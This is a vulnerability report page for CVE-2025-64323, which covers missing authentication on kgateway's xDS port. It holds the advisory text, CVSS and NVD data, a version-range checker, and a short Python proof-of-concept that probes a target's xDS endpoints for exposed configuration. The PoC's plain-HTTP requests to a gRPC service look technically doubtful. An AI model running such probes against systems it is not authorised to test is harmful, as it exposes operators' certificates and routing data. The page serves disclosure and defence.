Security Vulnerability Report
CVE-2025-64323 CVSS 5.3 MEDIUM

CVE-2025-64323

Published: 2025-11-07 04:15:47
Last Modified: 2026-04-15 00:35:42

Description

kgateway is a Cloud-Native API and AI Gateway. Versions 2.0.4 and below and 2.1.0-agw-cel-rbac through 2.1.0-rc.2 lack authentication, allowing any client with unrestricted network access to the xDS port to retrieve potentially sensitive configuration data including certificate data, backend service information, routing rules, and cluster metadata. This issue is solved in versions 2.0.5 and 2.1.0.
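The affected ranges above mix a plain version bound (2.0.4 and below) with a pre-release range (2.1.0-agw-cel-rbac through 2.1.0-rc.2), so a naive string or float comparison will misclassify deployments. The following added helper (not code from kgateway or from this report) evaluates a deployed version string against exactly the ranges stated in the description, using semver pre-release ordering (numeric identifiers compare numerically and sort before alphanumeric ones; a final release is higher than any of its pre-releases). The `AFFECTED_RANGES` and `FIXED_VERSIONS` tables are transcribed from the description; the version strings passed to `is_affected` in the usage section are constructed sample inputs.

```python
"""Evaluate a deployed kgateway version against the affected ranges stated in CVE-2025-64323."""
import re
from typing import List, Optional, Tuple

# Transcribed from the advisory description: "2.0.4 and below" and
# "2.1.0-agw-cel-rbac through 2.1.0-rc.2". None means no lower bound.
AFFECTED_RANGES: List[Tuple[Optional[str], str]] = [
    (None, "2.0.4"),
    ("2.1.0-agw-cel-rbac", "2.1.0-rc.2"),
]
FIXED_VERSIONS = ["2.0.5", "2.1.0"]

# Optional leading "v", MAJOR.MINOR.PATCH, optional -prerelease, optional +build (ignored).
_SEMVER = re.compile(
    r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$"
)


def parse(version: str) -> Tuple[Tuple[int, int, int], Tuple[str, ...]]:
    """Split a semver string into (core, prerelease identifiers)."""
    m = _SEMVER.match(version.strip())
    if not m:
        raise ValueError(f"not a semver string: {version!r}")
    core = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    pre = tuple(m.group(4).split(".")) if m.group(4) else ()
    return core, pre


def _pre_key(ident: str) -> Tuple[int, int, str]:
    # Numeric identifiers sort before alphanumeric ones and compare as integers;
    # alphanumeric identifiers compare lexically (semver.org, rule 11).
    return (0, int(ident), "") if ident.isdigit() else (1, 0, ident)


def compare(a: str, b: str) -> int:
    """Return -1, 0 or 1 for a < b, a == b, a > b under semver precedence."""
    core_a, pre_a = parse(a)
    core_b, pre_b = parse(b)
    if core_a != core_b:
        return -1 if core_a < core_b else 1
    # Same core: a release outranks any pre-release of that core.
    if not pre_a and not pre_b:
        return 0
    if not pre_a:
        return 1
    if not pre_b:
        return -1
    key_a = [_pre_key(i) for i in pre_a]
    key_b = [_pre_key(i) for i in pre_b]
    if key_a == key_b:
        return 0
    # Python list comparison also makes a shorter prefix sort lower, as semver requires.
    return -1 if key_a < key_b else 1


def is_affected(version: str) -> bool:
    """True if the version falls inside any range the advisory lists as vulnerable."""
    for low, high in AFFECTED_RANGES:
        above_low = low is None or compare(version, low) >= 0
        if above_low and compare(version, high) <= 0:
            return True
    return False


def triage(versions: List[str]) -> dict:
    """Map each deployed version string to 'affected' or 'not affected'."""
    return {v: ("affected" if is_affected(v) else "not affected") for v in versions}


if __name__ == "__main__":
    # Constructed sample inventory; replace with the image tags actually deployed.
    sample_inventory = ["v2.0.3", "2.0.4", "2.0.5", "2.1.0-rc.1", "2.1.0-rc.2", "2.1.0"]
    for version, verdict in triage(sample_inventory).items():
        print(f"{version:>18}: {verdict}")
```

Pre-release tags such as `2.1.0-agw-cel-rbac` are not valid PEP 440 versions, which is why the comparison is implemented by hand rather than with `packaging.version`; the fixed versions `2.0.5` and `2.1.0` both evaluate as not affected because `2.0.5` exceeds the first range's upper bound and a final `2.1.0` release outranks every `2.1.0-*` pre-release.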

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available in the record; the affected versions below are taken from the description.

kgateway <= 2.0.4
kgateway 2.1.0-agw-cel-rbac through 2.1.0-rc.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-64323 PoC - kgateway xDS Unauthorized Access

This PoC demonstrates the lack of authentication on the xDS port.
"""
import json
import sys

import requests


def check_xds_port(target_host, xds_port=15010):
    """
    Check if the xDS port is accessible without authentication.
    """
    base_url = f"http://{target_host}:{xds_port}"

    # Try to access xDS endpoints without authentication
    endpoints = [
        "/v3/discovery:clusters",
        "/v3/discovery:listeners",
        "/v3/discovery:routes",
        "/v3/discovery:endpoints",
    ]

    results = {
        "target": target_host,
        "port": xds_port,
        "vulnerable": False,
        "exposed_data": [],
    }

    for endpoint in endpoints:
        try:
            # gRPC-style request
            response = requests.post(
                f"{base_url}{endpoint}",
                headers={
                    "Content-Type": "application/json",
                    "xds-protocol-version": "v3",
                },
                json={
                    "node": {
                        "id": "test-node",
                        "cluster": "test-cluster",
                    },
                    "type_url": "type.googleapis.com/envoy.service.discovery.v3.DiscoveryRequest",
                    "resource_names": [],
                },
                timeout=5,
            )
            if response.status_code == 200:
                data = response.json()
                if data.get("resources"):
                    results["vulnerable"] = True
                    results["exposed_data"].append({
                        "endpoint": endpoint,
                        "status": "EXPOSED",
                        "resource_count": len(data.get("resources", [])),
                    })
        # ValueError covers a 200 response whose body is not JSON
        except (requests.exceptions.RequestException, ValueError):
            pass

    return results


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-64323-poc.py <target_host>")
        sys.exit(1)

    target = sys.argv[1]
    result = check_xds_port(target)
    print(json.dumps(result, indent=2))

    if result["vulnerable"]:
        print("\n[!] Target is VULNERABLE to CVE-2025-64323")
        print("[!] xDS port is accessible without authentication")
```

References

- https://github.com/kgateway-dev/kgateway/issues/10651
- https://github.com/kgateway-dev/kgateway/pull/12471
- https://github.com/kgateway-dev/kgateway/pull/12535
- https://github.com/kgateway-dev/kgateway/security/advisories/GHSA-4766-x535-jw3r
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-64323",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-07T04:15:47.243",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "kgateway is a Cloud-Native API and AI Gateway. Versions 2.0.4 and below and 2.1.0-agw-cel-rbac through 2.1.0-rc.2 lack authentication, allowing any client with unrestricted network access to the xDS port to retrieve potentially sensitive configuration data including certificate data, backend service information, routing rules, and cluster metadata. This issue is solved in versions 2.0.5 and 2.1.0."
      },
      {
        "lang": "es",
        "value": "kgateway es un Gateway de API e IA nativo de la nube. Las versiones 2.0.4 e inferiores y de la 2.1.0-agw-cel-rbac a la 2.1.0-rc.2 carecen de autenticación, lo que permite a cualquier cliente con acceso de red sin restricciones al puerto xDS recuperar datos de configuración potencialmente sensibles, incluyendo datos de certificados, información de servicios de backend, reglas de enrutamiento y metadatos de clúster. Este problema se resuelve en las versiones 2.0.5 y 2.1.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/kgateway-dev/kgateway/issues/10651", "source": "[email protected]"},
      {"url": "https://github.com/kgateway-dev/kgateway/pull/12471", "source": "[email protected]"},
      {"url": "https://github.com/kgateway-dev/kgateway/pull/12535", "source": "[email protected]"},
      {"url": "https://github.com/kgateway-dev/kgateway/security/advisories/GHSA-4766-x535-jw3r", "source": "[email protected]"}
    ]
  }
}
```